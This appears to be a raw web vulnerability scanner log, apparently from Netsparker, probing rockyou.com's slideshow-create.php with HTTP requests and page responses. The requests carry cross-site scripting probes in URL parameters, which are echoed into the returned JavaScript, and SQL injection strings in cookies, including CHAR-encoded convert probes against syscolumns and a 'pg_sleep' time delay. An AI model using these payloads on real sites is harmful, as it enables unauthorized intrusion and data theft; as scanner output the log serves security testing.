showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x001DCE)%3E&source=br&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLoc..
Date: Mon, 18 Apr 2011 22:27:32 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:27:31 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:27:32 GMT; path=/; domain=.rockyou.com,lastlogin=1303165652; expires=Wed, 27-Jul-2011 22:27:32 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:27:32 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=26144 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26862
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "br";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x001DCE)%3E&source=br&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLoc..
|
- /slideshow-create.php
/slideshow-create.php |
Parameters
| Parameter | Type | Value |
| source | GET | br |
| create | GET | '"><net sparker=alert(0x0025B0)> |
| instanceid | GET | 3 |
Request
GET /slideshow-create.php?source=br&create='%22%3E%3Cnet%20sparker=netsparker(0x0025B0)%3E&instanceid=3 HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166185; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166185; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:36:25 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:36:24 GMT; path=/; domain=.rockyou.com,lastlogin=1303166185; expires=Wed, 27-Jul-2011 22:36:25 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:36:25 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:36:25 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:36:25 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29086 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26941
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
